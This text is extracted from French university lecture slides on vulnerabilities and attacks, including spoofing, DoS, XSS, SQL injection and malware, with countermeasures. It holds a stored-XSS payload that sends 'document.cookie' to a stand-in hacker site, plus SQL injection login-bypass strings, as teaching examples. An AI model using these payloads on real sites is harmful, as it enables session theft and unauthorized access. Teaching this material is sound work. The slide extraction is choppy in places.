Chapitre 2

UNIVERSITÉ DE LA MANOUBA
ÉCOLE NATIONALE DES SCIENCES DE L’INFORMATIQUE
Cours :
SÉCURITÉ INFORMATIQUE
Préparé par :
DR. MAROUA BAKRI
[email protected]
Niveau : II3
PLAN DU CHAPITRE 2
VULNÉRABILITÉS ET ATTAQUES DE SÉCURITÉ
1 Vulnérabilités
Vulnérabilités au niveau organisationnel
Vulnérabilités au niveau physique
Vulnérabilités au niveau technologique
2 Attaques de sécurité
Ingénierie sociale
Les attaques réseaux
Les attaques système
3 Typologie des attaquants
SÉCURITÉ INFORMATIQUE - II3 MAROUA BAKRI ENSI 21

PLAN DU CHAPITRE 2
1 Vulnérabilités
Ingénierie sociale

PLAN DU CHAPITRE 2
1 Vulnérabilités
Ingénierie sociale

Vulnérabilités Vulnérabilités au niveau organisationnel
Attaques de sécurité Vulnérabilités au niveau physique
Typologie des attaquants Vulnérabilités au niveau technologique
 On entend par vulnérabilités toutes les faiblesses des ressources d’un

système d’information qui peuvent être exploitées par des menaces
dans le but de les compromettre.
 On distingue trois grandes familles de vulnérabilités :

 Vulnérabilités au niveau organisationnel
 Vulnérabilités au niveau physique
 Vulnérabilités au niveau technologique

PLAN DU CHAPITRE 2
1 Vulnérabilités
Ingénierie sociale

 Manque de maîtrise de la sécurité des systèmes d’information et de

communication.
Des ressources humaines spécifiques doivent être affectées à la

surveillance des systèmes d’information.
 Mauvaise utilisation des moyens en place et absence de contrôles effectifs

(exple : échange de mots de passe entre personnels ou utilisation des mots
de passe de type « faibles »).
 Absence de procédures relatives à la sécurité des systèmes d’information :

les règles à respecter sont rarement énoncées de façon claire.
 Manque d’information des utilisateurs : même si des procédures de sécurité

des systèmes d’information existent, souvent les utilisateurs et les
gestionnaires des systèmes semblent ne pas en avoir connaissance.

 Inadéquation entre la politique de sécurité et les risques : l’évaluation réelle

des risques encourus n’est réalisée que rarement et donc les mesures de
sécurité mises en place ne sont souvent pas en adéquation avec les risques
encourus.
 Organisation interne : la multiplication des pôles informatiques avec leurs

solutions dédiées entraîne une complexité voire une impossibilité à gérer la
sécurité des systèmes d’information de façon centralisée.

PLAN DU CHAPITRE 2
1 Vulnérabilités
Ingénierie sociale

 Non-redondance : l’indisponibilité d’un serveur ou d’une base de données,

pour des raisons liées aux systèmes informatiques, logiciels ou conditions
physiques (température, courant…), peut entraîner la rupture de services.
 Manque de contrôle d’accès aux éléments physiques : l’accès aux salles

informatiques doit être limité de manière à éviter des manipulations
(in)volontaires pouvant causer des risques et des pertes.
 Mauvaise conservation de supports de sauvegarde.
 Mauvaise gestion des ressources : les ressources doivent être

dimensionnées de façon correcte et surveillées de près.
 Absence de gestion du câblage, ce qui peut entraîner des déconnexions

intempestives voire la mise à disposition de ressources sur des réseaux
publics.

PLAN DU CHAPITRE 2
1 Vulnérabilités
Ingénierie sociale

 Interopérabilité des systèmes d’information et de communication : dans le

but de permettre une communication aisée entre différents systèmes, des
couches de communication supplémentaires sont souvent mises en place
ce qui peut entraîner l’apparition de nouvelles vulnérabilités.
 Fiabilité des mises à niveau et correctifs (patchs) : souvent la mise en place

des patchs se fait dans l’urgence et sans évaluation préalable.
 Complexité des règles sur les pare-feux et routeurs d’accès : la mise en

place de filtrage et des règles d’accès à la demande rend la vue d’ensemble
quasi-impossible.

PLAN DU CHAPITRE 2
1 Vulnérabilités
Ingénierie sociale

PLAN DU CHAPITRE 2
1 Vulnérabilités
Ingénierie sociale

Vulnérabilités Ingénierie sociale
Attaques de sécurité Les attaques réseaux
Typologie des attaquants Les attaques système
Attaque d’interception Attaque d’interruption/saturation

 DOS / DDOS
 Lecture du message  Ping of death
 Analyse du trafic  Ping flooding
 Ingénierie sociale  Smurf and fraggle
 Inondation SYN
 Mail Bombing
 Buffers overflow
Atteinte à la confidentialité Atteinte à la disponibilité

Attaque de modification Attaque d’usurpation d’identité/Fabrication

 IP spoofing
 Logiciels malveillants  ARP spoofing
 Virus  DNS spoofing
 Vers …  DNS ID spoofing
 DNS cache Poisioning
 Man-in-the-middle
 Replay attack (Re-jeux)
 Le cassage de mot de passe
 Attaque par dictionnaire
 Attaque par force brute
Atteinte à l’intégrité Atteinte à l’authenticité



PLAN DU CHAPITRE 2
1 Vulnérabilités
Ingénierie sociale

 L’ingénierie sociale (social engineering) est une attaque qui cherche à

extirper des informations à des personnes.
 Contrairement aux autres attaques, elle ne nécessite pas de logiciel.
 Il existe 4 grandes méthodes de social engineering, à savoir :

 par téléphone
 par lettre
 par internet
 par contact direct
 Exemple :

PLAN DU CHAPITRE 2
1 Vulnérabilités
Ingénierie sociale

Cartographie
 L’attaque par cartographie du réseau est une attaque qui permet de découvrir les artères de
communication d'un système d’information cible.
 Plusieurs techniques peuvent être utilisées pour cartographier un réseau, à savoir :
 Techniques non-intrusives (non-détectables) :
– Utilisation des ressources publiques : le Web, Usenet.
– Utilisation des outils réseau : Whois, nslookup.
 Techniques semi-intrusives (détectables à l'aide d’un système de détection d'intrusion) :
– Utilisation des outils réseau : ping et traceroute.
N.B : Le principe de fonctionnement de Traceroute consiste à envoyer des paquets ICMP ECHO
Request avec un paramètre Time-To-Live (TTL) de plus en plus grand (en commençant à 1).
Chaque routeur qui reçoit un paquet IP en décrémente le TTL avant de le transmettre. Lorsque le
TTL atteint 0, le routeur émet un paquet ICMP d'erreur Time to live exceeded vers la source.
Traceroute découvre ainsi les routeurs de proche en proche. Dans la réponse d'un ping, le
paramètre TTL permet également de déterminer le nombre de routeurs qui ont été traversés
pour effectuer le retour.
 Techniques intrusives (détectables) :
– Utilisation des propriétés des protocoles : SNMP, RPC.
Sniffing
 Le Sniffing ou reniflement de trafics constitue l’une des méthodes couramment
utilisée par les pirates informatiques pour espionner le trafic sur le réseau.
 Pour ce faire, les pirates informatiques utilisent des sniffers réseau ou renifleurs
de réseau, des sortes de sondes que l'on place sur un réseau pour pouvoir le
surveiller et soustraire frauduleusement les différents types de données
confidentielles susceptibles de les intéresser surtout lorsque ces informations
sont transférées par des protocoles qui ne sont pas suffisamment sécurisés
comme : FTP, DNS, HTTP.
 Le sniffer peut être un équipement matériel ou un logiciel. Généralement, le

matériel est plus puissant et plus efficace que le logiciel.
 On distingue deux types de sniffing :

 Passive sniffing
 Active sniffing

Sniffing
 Passive sniffing : à travers un hub
Lorsqu'une machine veut communiquer avec une autre sur un réseau non-switché
(relié par un hub), elle envoie ses messages sur le réseau à l'ensemble des machines
et normalement seule la machine destinataire intercepte le message pour le lire, alors
que les autres l'ignorent. Ainsi en utilisant la méthode du sniffing, il est possible
d'écouter le trafic passant par un adaptateur réseau (carte réseau, carte réseau sans
fil…). Le sniffer décompose ces messages et les rassemble, ainsi les informations
peuvent être analysées à des fins frauduleuses (détecter des logins, des mots de
passe, des emails).
 Active sniffing : à travers un switch

Un switch transmis une trame à travers un port en s’appuyant sur l’adresse MAC.
Ainsi, pour pouvoir intercepter le trafic destiné à une machine destinataire, il suffit
d’usurper son identité en utilisant une des techniques d’usurpation d’identité tq ARP
spoofing.

Sniffing
Contre-mesures :
 Détection des machines (cartes réseau) qui utilisent le mode « promiscuous1 ».
pour cela, on peut soit utiliser un AntiSniff (un logiciel permettant la détection
des machines du réseau qui sont en cours d'exécution en mode promiscuous),
soit envoyer par exemple une requête ARP en "pseudo-broadcast". Ainsi, si la
machine répond, sa carte est en mode promiscuous, sinon elle ne l'est
probablement pas.
 Utilisation du ARPWATCH – un outil d'administration réseau permettant de

surveiller l'activité du protocole ARP d'un réseau informatique et de détecter
tout changement des adresses MAC des machines sur ce réseau (contre-
mesure du ARP poisoning).
1 : « Promiscuous mode » ou « mode promiscuité » se réfère à une configuration de la carte réseau, qui
permet à celle-ci d'accepter tous les paquets qu'elle reçoit, même si ceux-ci ne lui sont pas adressés.

IP spoofing
 Il s’agit d’une usurpation d'adresse IP.
 Cette attaque peut être utilisée pour deux raisons différentes :

1. Falsifier la source d'une attaque.
Exemple : lors d'une attaque de type DOS, l'adresse IP source des paquets
envoyés sera falsifiée pour éviter de localiser la provenance de l'attaque.
2. Profiter d'une relation de confiance entre deux machines pour prendre la

main sur l'une des deux afin d’acquérir ses privilèges pour accéder à un
certain nombre de service.

IP spoofing
C souhaite usurper l’identité de A auprès de B.
1. C trouve l’adresse IP de A et la met hors service (par exemple avec un SYN

Flooding) pour éviter qu'elle ne réponde aux paquets éventuellement
envoyés par B.
2. C prédit les numéros de séquence TCP (numéros caractérisant une connexion
TCP) de B en lui envoyant des paquets et en analysant les réponses.
3. C lance l'attaque en créant une connexion TCP sur B. Pour ce faire, C forge un
paquet TCP avec le flag SYN et l'adresse IP source de A.
4. B répond à A par un paquet TCP avec les flags SYN-ACK. Toutefois, A ne peut
pas le valider car rendu inopérant.
5. C acquitte alors la connexion en forgeant un paquet TCP avec le flag ACK et le
bon numéro de séquence (numéro de séquence envoyé par B incrémenté de
1). La connexion est ainsi établie en toute impunité permettant à C d’accéder
librement à B.

IP spoofing
Contre-mesures :
 Ne pas utiliser uniquement l'adresse IP comme méthode d'authentification

(ajouter au moins un login et un password).
 Vérifier que son système n'a pas des numéros de séquence TCP facilement
prédictible.
 Vérifier que la fonction anti-spoofing est bien présente sur le firewall.

ARP spoofing
 L'attaque ARP spoofing vise les réseaux locaux Ethernet, qu'ils soient
partitionnés ou non en sous-réseaux.
 Une technique de spoofing efficace mais détectable dans les logs

d'administration.
 Elle permet à l'attaquant de détourner des flux de communications transitant
entre une machine cible et une autre machine du réseau en faisant
correspondre l’adresse IP de la machine cible à l'adresse MAC de la machine
pirate dans les tables ARP des machines du réseau.
 Pour ce faire, l’attaquant envoie régulièrement des paquets ARP_reply en
broadcast, contenant l'adresse IP cible et la fausse adresse MAC (l’adresse
MAC du pirate) afin de modifier les tables dynamiques de toutes les machines
du réseau.
 Les trames Ethernet à destination la machine cible sont ainsi envoyées à la
machine pirate qui stocke le trafic et le renvoie par la suite à la vraie machine
en forgeant des trames Ethernet comportant la vraie adresse MAC.
ARP spoofing
Contre-mesures :
 Avoir des logs régulièrement mis à jour et étudiés.
 N'utiliser que des tables ARP statiques.
 Utiliser des logiciels spécialisés pour monitorer les paires IP/MAC.

DNS spoofing
 L’attaque du DNS spoofing vise la redirection des Internautes vers des sites
pirates.
 L’objectif du pirate est de faire correspondre l'adresse IP d'une machine qu'il

contrôle à un nom réel et valide d'une machine publique.
 Il existe deux principales attaques de type DNS Spoofing :
1. le DNS ID Spoofing
2. le DNS Cache Poisoning.

DNS ID spoofing
 Si une machine A veut communiquer avec une machine B, la machine A a

obligatoirement besoin de l'adresse IP de la machine B. A possédant
uniquement le nom de B utilise le protocole DNS pour obtenir l'adresse IP de B
à partir de son nom. Une requête DNS est alors envoyée à un serveur DNS,
déclaré au niveau de A, demandant la résolution du nom de B en son adresse
IP. La requête envoyée est identifiée par un numéro d'identification. Le serveur
DNS enverra la réponse à cette requête avec le même numéro
d'identification.
 L'attaque consiste alors à récupérer ce numéro d'identification pour pouvoir

envoyer une réponse falsifiée avant le serveur DNS. Ainsi, la machine A
utilisera, sans le savoir, l'adresse IP du pirate et non celle de la machine B
initialement destinatrice.

DNS Cache Poisoning

 Les serveurs DNS possèdent un cache permettant de garder pendant un certain
temps la correspondance entre un nom de machine du domaine sur lequel il n’a pas
autorité et son adresse IP.
 Le DNS Cache Poisoning consiste à corrompre ce cache avec de fausses informations.
Pour ce faire, le pirate doit avoir sous son contrôle un nom de domaine (soit Domaine)
et le serveur DNS ayant autorité sur celui-ci (soit Serveur-Domaine).
 Le pirate envoie une requête vers le serveur DNS cible (victime) demandant la
résolution du nom d'une machine du domaine (par exemple, Domaine ).
 Le serveur DNS cible relaie cette requête au serveur DNS ayant autorité sur le
domaine en question (càd Serveur-Domaine).
 Le serveur DNS du pirate (modifié pour l'occasion) enverra alors, en plus de la
réponse, des enregistrements additionnels dans lesquels se trouvent les informations
falsifiées à savoir un nom de machine publique associé à une adresse IP du pirate.
 Les enregistrements additionnels sont alors mis dans le cache du serveur DNS cible.
 Une machine faisant une requête sur le serveur DNS cible demandant la résolution
d'un des noms corrompus aura pour réponse une adresse IP autre que l'adresse IP
réelle associée à cette machine.
DNS spoofing
Contre-mesures :
 Mettre à jour les serveurs DNS pour éviter la prédictibilité des numéros
d'identification et les failles permettant de prendre le contrôle du serveur.
 Configurer le serveur DNS pour qu'il ne résolve directement que les noms
des machines du domaine sur lequel il a autorité.
 Limiter le cache et vérifier qu'il ne garde pas les enregistrements

additionnels.
 Ne pas baser de systèmes d'authentifications par le nom de domaine.

Man-in-the-middle
 L'attaque de l'homme du milieu ou man-in-the-middle attack est une attaque qui vise
l’interception des communications entre deux parties, sans que ni l'une ni l'autre ne
puisse se douter que le canal de communication entre elles a été compromis.
 Dans l'attaque de l'homme du milieu, l'attaquant a non seulement la possibilité de

lire, mais aussi de modifier les messages. Son but est de se faire passer pour l'un voire
même les 2 correspondants, en utilisant, par exemple : l'ARP Spoofing, le DNS
Poisoning, l'analyse de trafic, ou le déni de service.

Replay attack
 Une attaque par re-jeu (ou replay attack) est une forme d'attaque réseau dans
laquelle une transmission est malicieusement ou frauduleusement répétée par une
tierce partie interceptant les paquets sur la ligne.
 Exemple :
Supposons qu'Alice veuille prouver son identité à Bob. Bob demande le mot de passe
à Alice, que cette dernière envoie (après l'avoir crypté). Pendant ce temps Ève écoute
la conversation et stocke le message contenant le mot de passe. Une fois l'échange
terminé, Ève contacte Bob en se faisant passer pour Alice. Quand Bob lui demande
son mot de passe, Ève renvoie le message qu'elle avait préalablement intercepté sans
pour autant le comprendre (car il est chiffré). Bob croit donc avoir une
communication avec Alice.
 Contre-mesure :
Utilisation de protocoles de sécurité tq IPSec qui implémente un mécanisme d'anti-

rejeu basé sur l'utilisation d'un code d'authentification de message ou MAC.
Déni de service (DOS)
 Le déni de service ou "Denial-Of-Service" (DOS) est une attaque très évoluée visant à
rendre muette une machine en la submergeant de trafic inutile.
 Il peut y avoir plusieurs machines à l'origine de cette attaque. On parle alors d’une
attaque distribuée (DDoS) qui vise à anéantir des serveurs, des sous-réseaux …
 Cette attaque est très difficile à contrer ou à éviter.
 Exemples d’attaques créant un déni de service :

 Ping of death
 Ping flooding
 Smurf and fraggle
 Inondation SYN


Ping of death
 Un ping of death est un ping qui a une longueur de données supérieure à la taille
maximale autorisée. Lors de son envoi, le ping of death est fragmenté en paquets
plus petits. La machine victime qui reçoit ces paquets doit alors les reconstruire.
Certains systèmes ne gèrent pas cette fragmentation, et se bloquent, ou crashent
complètement.
 Contre-mesures :
 Mettre à jour l'OS.
 Test de la taille des paquets.
 Test de la fragmentation.
Ping flooding
 Cette attaque consiste à envoyer un flux maximal de ping vers une machine cible
(victime).
 Contre-mesure :
 Utilisation d’un firewall.

Smurf and fraggle
 Il s’agit d’un ping flooding un peu particulier.
 Cette attaque se déroule en deux étapes :

1. La première étape consiste à récupérer l'adresse IP de la machine cible (victime)
par spoofing.
2. La seconde étape consiste à envoyer un flux maximal de paquets ICMP ECHO
Request aux adresses de Broadcast. Chaque paquet comporte comme adresse
source l'adresse spoofée de la machine cible. Toutes les machines du réseau
répondent à la machine cible qui recevra par conséquent un maximum de
réponses au ping saturant totalement sa bande passante.
 Configurer le firewall pour filtrer les paquets ICMP echo request ou les limiter à
un pourcentage de la bande passante.
 Configurer le routeur pour désactiver le broadcast.

Inondation SYN (SYN Flooding Attack)
 Une demande de session TCP se fait en trois étapes:
– le client envoie au serveur un paquet SYN avec un numéro de séquence initial
Nclient et un numéro d'acquittement nul ;
– le serveur place alors cette requête dans sa file d'attente de connexion et
renvoie au client un paquet SYN|ACK de numéro de séquence Nserveur et un
numéro d'acquittement égal à Nclient + 1 ;
– le client répond par un paquet ACK de numéro de séquence Nclient + 1 et un
numéro d'acquittement Nserveur + 1 ;
 La connexion est alors établie et le client et le serveur peuvent commencer à
échanger des données.
 Dans l’attaque inondation SYN, l’attaquant envoie de nombreuses demandes de
connexion (paquets TCP SYN) avec des adresses sources usurpées (spoofées). La
machine cible (victime) alloue des ressources pour chaque demande reçue. Une fois
les ressources disponibles sont épuisées, les demandes des clients légitimes se voient
refuser.

Inondation SYN (SYN Flooding Attack)
 Contre-mesure :
 Utilisation des SYN cookies – des valeurs particulières des numéros de séquences
initiales générés par un serveur lors d'une demande de connexion TCP. En
utilisant un SYN cookie, le serveur n’alloue pas une ressource pour enregistrer la
demande de connexion du client mais plutôt il va se servir du réseau comme
d’une zone mémoire en envoyant au client les informations dont il a besoin pour
établir la connexion. Le client les lui retournera par la suite.

Mail bombing
 Cette attaque consiste à envoyer un nombre faramineux d'emails (plusieurs milliers
par exemple) à un ou plusieurs destinataires.
 Le but étant de :
 saturer le serveur de mails
 saturer la bande passante du serveur et du ou des destinataires,
 rendre impossible aux destinataires de continuer à utiliser l'adresse électronique.
 L’attaquant doit se procurer un logiciel permettant de réaliser le mail bombing.
 Posséder plusieurs boîte aux lettres : une principale que vous ne divulguez
qu'aux personnes dignes de confiance, et une à laquelle vous tenez moins,
utilisée par exemple pour s'inscrire à des services en ligne sur Internet ;
 Installer un logiciel antispam qui interdira la réception de plusieurs messages
identiques à un intervalle de temps trop court.

PLAN DU CHAPITRE 2
1 Vulnérabilités
Ingénierie sociale

Balayage de port (portscan)

 Le balayage de port est une technique informatique visant à rechercher les ports
ouverts d’une machine (ordinateur, serveur, ...).
 Utilisé majoritairement par deux catégories de personnes :

 Les administrateurs réseaux : le balayage de port servira aux administrateurs
réseaux afin de vérifier la sécurité de leur réseau et leurs serveurs ;
 Les pirates informatiques : il permet également aux pirates informatiques de
préparer une intrusion sur une machine en tentant de trouver une faille dans le
système informatique.
 L’outil le plus utilisé pour le balayage de port est Nmap. Il s’agit d’un logiciel gratuit
permettant de détecter comment réagissent les ports d’une machine. Il donne aussi
accès à des informations telles que le système d’exploitation utilisé, sa version et
certains logiciels installés sur la machine cible.
 Utilisation d’un firewall et d’un système de détection d’intrusion.

Cassage de mot de passe

 Les mots de passe de la plupart des logiciels sont stockés cryptés dans un fichier.
Pour obtenir un mot de passe, il suffit de récupérer ce fichier et de lancer un logiciel
soit de dictionary cracking, soit de brute force cracking.
1. Attaque par dictionnaire (Dictionary Cracking)

 L’attaque du dictionary cracking consiste à utiliser un logiciel qui va tester un
nombre limité de mots, de manière à trouver le mot de passe désiré sachant que
chaque mot de passe est en fait un mot d'usage courant (un prénom, un nom, ou
une abréviation).
 Contre-mesures :
 N'utiliser pas de mots de passe signifiant quelque chose.
 Utiliser plutôt une combinaison de chiffres et de lettres.
 Changer vos mots de passe régulièrement.
 L'utilisation d'autres techniques pour la protection par mots de passe est
recommandée.

Cassage de mot de passe
2. Attaque par force brute (Brute force cracking)
 Cette technique consiste à tester de façon exhaustive toutes les combinaisons

possibles de caractères (alphanumériques + symboles), de manière à trouver au
moins un mot de passe valide. Cette attaque se base sur le fait que n'importe
quel mot de passe est crackable et que ce n'est qu'une histoire de temps.
 Contre-mesure :
 Utilisation d'autres techniques pour la protection par mots de passe tq les
méthodes d'authentification forte.

Buffers overflow
 Un buffer overflow est une attaque très efficace et assez compliquée à réaliser qui
vise à exploiter une faille ou une faiblesse dans une application (type browser, logiciel
de mail...) pour exécuter un code malveillant qui compromettra la cible (acquisition
des droits administrateur...).
 L’objectif de cette attaque est de faire crasher un programme en écrivant dans un
buffer (une zone mémoire temporaire utilisée par une application) plus de données
qu'il ne peut en contenir afin d'écraser des parties du code de l'application vulnérable
et d'injecter des données utiles pour exploiter le crash de l'application.
 Nous distinguons deux types de codes malveillants pouvant être exécutés dans une
attaque de buffer overflow :
1. Un code provoquant une sorte de déni de service monopolisant un ensemble ou
un sous-ensemble des ressources de la machine. (Boucle infinie)
2. Un code permettant d'exécuter des routines du système dans un but d'intrusion
ou de destruction. (Shellcode)
 Une attaque par buffer overflow signifie en général que l'on a affaire à des
attaquants doués plutôt qu'à des "script kiddies".
Buffers Overflow

Buffers overflow
 lors du développement : propreté du code source (utiliser malloc/free le plus

possible, utiliser les fonctions n comme strncpy pour vérifier les limites...),
utilisation de librairies de développement spécialisée contre les buffers
overflow (Libsafe d'Avayalabs).
 utiliser un langage n'autorisant pas ce type d'attaques : Java, Cyclone (qui est
issu du C).
 utiliser des logiciels spécialisés dans la vérification de code, comme par exemple
le compilateur StackGuard d'Immunix.
 appliquer le plus rapidement possible les patches fournis par les
développeurs…

Cross Site Scripting (XSS)

 Les attaques de type Cross-Site Scripting (XSS) sont des attaques visant les sites web
affichant dynamiquement du contenu utilisateur sans effectuer de contrôle et
d'encodage des informations saisies par les utilisateurs. Elles consistent à forcer un
site web à afficher du code HTML ou des scripts malicieux saisis par les utilisateurs.
 Grâce aux vulnérabilités Cross-Site Scripting, il est possible à un pirate de :
 récupérer par ce biais les données échangées entre l'utilisateur et le site web
concerné (cookies…).
 injecter un code malveillant permettant d’afficher un formulaire afin de
tromper l'utilisateur et lui faire saisir, par exemple, des informations
d'authentification.
 injecter un script permettant de rediriger l'utilisateur vers une page sous le
contrôle du pirate, possédant éventuellement la même interface graphique
que le site compromis afin de tromper l'usager.
 Il existe deux types de XSS :
1. le XSS réfléchi (non permanent)
2. le XSS stocké (permanent)

XSS réfléchi (non permanent)
 Le code injecté n'est pas enregistrée ni dans un fichier ni dans une base de données
sur le serveur web.
 À première vue, le XSS réfléchi n'est pas un problème grave parce que l'utilisateur
peut seulement injecter du code dans ses propres pages. Cependant, avec un peu
d'ingénierie sociale, un attaquant peut convaincre un utilisateur de suivre une URL
piégée qui injecte du code dans la page de résultat, ce qui donne à l'attaquant tout
contrôle sur le contenu de cette page.
 Exemple :
Soit le site « http://www.sitevulnerable.net », un site vulnérable à une attaque de type
XSS réfléchi car il permet d'afficher sur sa page d'accueil un message de bienvenue
affichant le nom de l'utilisateur passé en paramètre :
http://www. sitevulnerable.net/?nom=aaa
Code injecté :
http://www. sitevulnerable.net/?nom=<b>aaa</b>
SÉCURITÉ INFORMATIQUE - II3 MAROUA BAKRI ENSI 51 1

XSS stocké (permanent)
 Il s’agit de la faille XSS la plus sérieuse car le script est sauvegardé dans un fichier ou
une base de données sur le serveur Web. Il sera donc affiché à chaque ouverture du
site. Exemple : un forum dans lequel les utilisateurs peuvent poster des
commentaires.
 Exemple :
Code injecté sous forme de commentaire :
<img src="azerty.jpg" onerror="window.location=
'http://www.site_du_hacker.com/recuperation_cookie.php?cookie='+document.cook
ie;" hidden>
Ce script HTML/JavaScript redirige l'utilisateur s'il y a une erreur lors du chargement
de l'image (tout est bien sûr calculé pour qu'il y ait une erreur) vers la page de
récuperation_cookie.php, et tout ça en communiquant le contenu de votre cookie
dans l'URL. Sur la page recuperation_cookie.php, le pirate n'aura qu'à récupérer la
variable cookie grâce à un GET et la stocker dans un fichier et par conséquent détenir
vos informations personnelles.

XSS stocké
 Contre-mesure :
 La seule façon viable d'empêcher les attaques Cross-Site Scripting consiste à
concevoir des sites web non vulnérables. Pour ce faire, le concepteur d'un site
web doit :
– Vérifier le format des données entrées par les utilisateurs ;
– Encoder les données utilisateurs affichées en remplaçant les
caractères spéciaux par leurs équivalents HTML.
Injection SQL
 L'injection SQL directe est une technique où un pirate modifie une requête SQL
existante pour afficher des données cachées, ou pour écraser des valeurs
importantes, ou encore exécuter des commandes dangereuses pour la base.
 Exemples :
– SELECT * FROM utilisateurs WHERE login='jean' # AND password='‘
Grâce à cette injection l'utilisateur va pouvoir se connecter à n'importe quel
compte ayant comme login « jean » sans connaitre son mot de passe.
– En utilisant, les conditions toujours vraies comme 1 = 1 :
SELECT * FROM admin WHERE login='' OR '1'='1' AND pass='' OR '1'='1'
 Pour l'injection dans les variables qui contiennent des chaînes de caractères :
éviter (d’échapper) les caractères spéciaux à l’aide de
« mysqli_real_escape_string() » ;
 Pour l'injection dans les variables numériques : utiliser intval() et is_numeric() ;

Logiciels malveillants
 Programmes autoreproducteurs :
 Virus
 Vers
 Infections informatiques :
 Bombe logique
 Cheval de Troie
 Porte dérobée (Backdoor)
 Spyware
 Adware
 Keylogger
 Rootkit

– Utilisation d'un firewall pour filtrer ce qui vient d'extranet.
– Utilisation d'au moins un antivirus, remis à jour très régulièrement et exécuté
régulièrement pour la protection contre les virus, les vers...
– Utilisation d’un anti-espion pour la recherche des spywares, backdoors, rootkits …
– Contrôle d’intégrité pour vérifier si le système a été altéré ;
– Utilisation de détecteur d’intrusions pour la recherche de la présence d’un intrus ;

Virus
 Un virus est un programme parasite autopropageable et autoreproducteur.
 Les virus sont dépendants du système d'exploitation ou d'un logiciel (un virus
informatique ne peut être activé que par l’exécution d’un programme porteur du virus).
 Ils se propagent, comme toutes données binaires par :
 disquettes, CD ROM, clés USB …
 réseaux (Internet, LAN …)
 Freewares, sharewares sur le web
 Mails news (attachements, carnets d’adresses)
 Plugins pour les navigateurs
 …
 Les conséquences de la présence d’un virus sont multiples :
 Ralentissement système.
 Blocage système.
 Crash système.
 Pertes de données …
Virus
Types de virus :
 Virus exécutables :
– « Virus de remplacement » : écrasent des programmes avec eux-mêmes
– « Virus parasites » : s’attachent à des programmes, en tête, en queue, ou dans des
cavités, et infectent et causent des dommages lorsqu’ils sont exécutés.
 Virus résidents : cachés en RAM en permanence, ils infectent chaque application exécutée.
 Virus du secteur Boot : infectent les fichiers de démarrage, et se multiplient en démarrage.
 Virus pilotes : chargés « officiellement » par le système, exécutés en mode noyau.
 Virus polymorphe : mute à chaque infection, difficile à détecter sa signature.
 Virus métamorphique : se réécrit complètement à chaque fois et change son
comportement.
 Macros / scripts : VB dans Ofﬁce, ELisp dans Emacs etc. Transmission par mail croissante. Peu
de qualiﬁcations requises.
 Virus source : contaminent les sources plutôt que les exécutables.
Antivirus
 Fonctions basiques :
– Détection : détermine que l’infection par un virus s’est produite
– Identification : identifie le virus spécifique relié à l’infection
– suppression : supprime les virus de programmes infectés
 Antivirus de Première Génération :
– exigent la signature de virus (structure, modèle binaire, les caractères génériques) pour
identifier les virus ;
– mémorisent la longueur des programmes et recherchent les changements ;
 Antivirus de deuxième génération :
– utilisent des règles heuristiques et la recherche de l’infection probable ;
– cherchent des portions cryptées de codes et déterminent les clés privées ;
– vérifient l’intégrité en utilisant les empreintes digitales, les hash codes ;
 Antivirus de troisième génération :
– résident dans la mémoire et identifient les virus par leurs actions et non signature ;
 Antivirus de quatrième génération :
– package contenant des Techniques AV multiples qui limitent la capacité d’infection des virus ;
Vers
 Les vers sont des programmes parasites, actifs et autonomes qui peuvent se répliquer
à des hôtes distants sans déclenchement.
 Leur réplication n’infecte généralement pas les programmes hôtes.
 Parce qu’ils se propagent de manière autonome, ils peuvent se propager beaucoup
plus rapidement que les virus !
 Leur vitesse de propagation fait que les vers constituent les menaces les plus
importantes.
 Les conséquences de la présence des vers sont multiples :
 Ralentissement système.
 Blocage système.
 Crash système.
 Pertes de données.
 …
Bombe logique
 Une bombe logique est une infection qui attend un évènement (date, action, données
particulières, un utilisateur particulier, une série particulière de frappes de clavier, …)
appelé en général “gâchette” pour exécuter sa fonction offensive.
 Une fois déclenchée, le système est endommagé.
 Elle modifie/supprime des fichiers/disques.

Chevaux de Troie
 Les chevaux de Troie ("Trojan horses" ou "Trojans" en anglais) tirent leur nom de la
célèbre légende mythologique grecque.
 Il s’agit de programmes qui semblent avoir une fonction mais en fait ils effectuent une
autre (lorsqu’il est exécuté, un cheval de Troie performe d’autres tâches
qu’annoncées). Généralement, ils ressemblent à des programmes que l’utilisateur est
attiré à exécuter. Ex : jeu ; mise à jour d’un software…
 Leur objectif est le plus souvent d'ouvrir une porte dérobée ("backdoor") sur le
système cible, permettant par la suite à l'attaquant de revenir à loisir épier, collecter
des données, les corrompre, contrôler voire même détruire le système.
 Contrairement aux virus et aux vers, les chevaux de Troie ne se reproduisent pas.

Porte dérobée
Une porte dérobée (Backdoor/Trapdoor) est un moyen de contourner les mécanismes
de contrôle d’accès. Il s’agit d’une faille du système de sécurité qui provient soit d’une
faute de conception (volontaire ou accidentelle), soit d’une altération du système
durant sa phase opérationnelle.
Spyware
Un spyware est une infection dont l’objectif est de divulguer à un attaquant des
informations issues du système infecté. Il se trouve généralement dans le code d'un
programme que l'utilisateur téléchargera innocemment sur internet.
Adware
Un adware est une infection dont l’objectif est d’envoyer à l’utilisateur du système
infecté de la publicité ciblée. Pour ce faire, il espionne les habitudes de l’utilisateur.

Key Loggers
 Les Key Loggers sont des enregistreurs de touches et par extension des
enregistreurs d'activités informatiques permettant d'enregistrer les touches
utilisées par un utilisateur sur son clavier et tous les évènements déclenchés.
 Les touches enregistrées permettent effectivement de retracer non seulement le
travail courant, mais aussi de récupérer tous les identifiants et mots de passes.
RootKit
 Un rootkit est un programme parasite permettant à un attaquant de maintenir dans
le temps un contrôle frauduleux sur un système informatique.
 Son but principal est de transformer en zombie le PC infecté en le reliant à un
nœud d'un immense réseau d'ordinateurs puis l’utiliser pour lancer des attaques
indirectement (utilisé souvent pour lancer des attaques DDoS).

Mail, Sites malveillants

Spam
 On entend par spam l'envoi massif de courrier électronique (souvent de type
publicitaire) à des destinataires ne l'ayant pas sollicité.
 Le but premier du spam est de faire de la publicité à moindre prix par envoi massif de
courrier électronique non sollicité.
 Le principal inconvénient du spam est l'espace qu'il occupe sur le réseau, en
encombrant inutilement une partie de la bande-passante. Le spam induit des coûts
supplémentaires pour les fournisseurs d'accès à internet car ces derniers doivent :
 mettre en place une plus grande largeur de bande
 acheter des serveurs supplémentaires pour gérer le spam
 disposer d'un plus grand espace disque
 engager du personnel supplémentaire pour traiter les réclamations
 Du coup, ces frais supplémentaires se répercutent sur les abonnés, de par le prix
supplémentaire de l'abonnement, et du temps perdu inutilement à trier le bon et le
mauvais courrier.

Spam
Contre-mesures :
 Ne pas répondre au spam, car cela peut permettre aux spammeurs de savoir
que votre adresse électronique est valide.
 Utilisation d’un anti-spam.


Phishing
